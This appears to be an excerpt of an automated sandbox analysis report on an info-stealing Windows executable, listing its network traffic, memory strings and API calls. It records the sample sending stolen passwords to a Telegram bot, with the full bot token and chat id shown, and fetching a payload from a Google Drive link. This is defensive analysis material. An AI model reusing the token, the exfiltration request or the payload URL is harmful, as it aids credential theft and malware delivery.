            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd317e95a26f14Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034C5E000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034985000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034BD0000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000349C7000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000349C3000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034A2A000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndn
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034C5E000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034BD0000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000349C7000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034A2A000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000347C1000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034C5E000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034985000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034BD0000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000349C7000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034A2A000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000347C1000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2662908306.0000000037080000.00000004.00000020.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000003.2518298359.0000000037143000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: m0CZ8H4jfl.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000347C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034C5E000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034985000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034BD0000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000349C7000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.000000003489B000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034887000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034A2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgt
            Source: m0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2637853910.00000000040A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2637853910.00000000040E1000.00000004.00000020.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2658721205.0000000033990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1t3Ywt6vnH907sJTvu0e7Lz4I8WNHZFcN
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2637853910.0000000004118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/1W
            Source: m0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2637853910.00000000040FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1t3Ywt6vnH907sJTvu0e7Lz4I8WNHZFcN&export=download
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2637853910.00000000040FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1t3Ywt6vnH907sJTvu0e7Lz4I8WNHZFcN&export=downloadK
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2637853910.0000000004118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/xW
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000347F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000347F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000347F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000347F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189ec
            Source: m0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: m0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: m0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: m0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: m0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: m0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: m0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: m0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
            Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.9:49973 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49974 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49978 version: TLS 1.2
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_004032A0 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_004032A0 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004032A0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_00404B300_2_00404B30
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_004070410_2_00407041
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_0040686A0_2_0040686A
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_004070413_2_00407041
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_0040686A3_2_0040686A
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_00404B303_2_00404B30
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_001543283_2_00154328
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_00158E0C3_2_00158E0C
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_001559783_2_00155978
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_347454E93_2_347454E9
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_3474CCA03_2_3474CCA0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_3474603D3_2_3474603D
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_347403AF3_2_347403AF
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB96C83_2_36AB96C8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB86503_2_36AB8650
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36ABBDF03_2_36ABBDF0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB9D103_2_36AB9D10
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB63683_2_36AB6368
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36ABA3603_2_36ABA360
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36ABA9B03_2_36ABA9B0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB96B83_2_36AB96B8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB36B03_2_36AB36B0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB36C03_2_36AB36C0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB2E103_2_36AB2E10
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB56603_2_36AB5660
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB86403_2_36AB8640
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB56503_2_36AB5650
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB0FA83_2_36AB0FA8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB67B03_2_36AB67B0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36ABAFF83_2_36ABAFF8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36ABAFF73_2_36ABAFF7
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB67C03_2_36AB67C0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB5F013_2_36AB5F01
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB5F103_2_36AB5F10
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB3F603_2_36AB3F60
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB3F703_2_36AB3F70
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB1CA03_2_36AB1CA0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB74B83_2_36AB74B8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB1CB03_2_36AB1CB0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB74C83_2_36AB74C8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB6C093_2_36AB6C09
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB14003_2_36AB1400
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB6C183_2_36AB6C18
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB4DA03_2_36AB4DA0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB4DB03_2_36AB4DB0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB9D003_2_36AB9D00
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB25603_2_36AB2560
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB25503_2_36AB2550
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB5AA83_2_36AB5AA8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB5AB83_2_36AB5AB8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36ABBA973_2_36ABBA97
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB52083_2_36AB5208
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB32683_2_36AB3268
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB43B93_2_36AB43B9
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB43C83_2_36AB43C8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB3B083_2_36AB3B08
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB3B183_2_36AB3B18
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB7B4F3_2_36AB7B4F
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB63583_2_36AB6358
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36ABA3523_2_36ABA352
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB20FA3_2_36AB20FA
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB48203_2_36AB4820
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB48103_2_36AB4810
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB70613_2_36AB7061
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB70703_2_36AB7070
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB00403_2_36AB0040
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB18583_2_36AB1858
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB29A83_2_36AB29A8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36ABA9A03_2_36ABA9A0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB29B83_2_36AB29B8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB51F83_2_36AB51F8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36ABF1363_2_36ABF136
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_36AB21083_2_36AB2108
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_37AFE7C83_2_37AFE7C8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_37AFD6083_2_37AFD608
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_37AF83283_2_37AF8328
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: String function: 00402BBF appears 49 times
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2659748778.00000000345E7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs m0CZ8H4jfl.exe
            Source: m0CZ8H4jfl.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@6/5
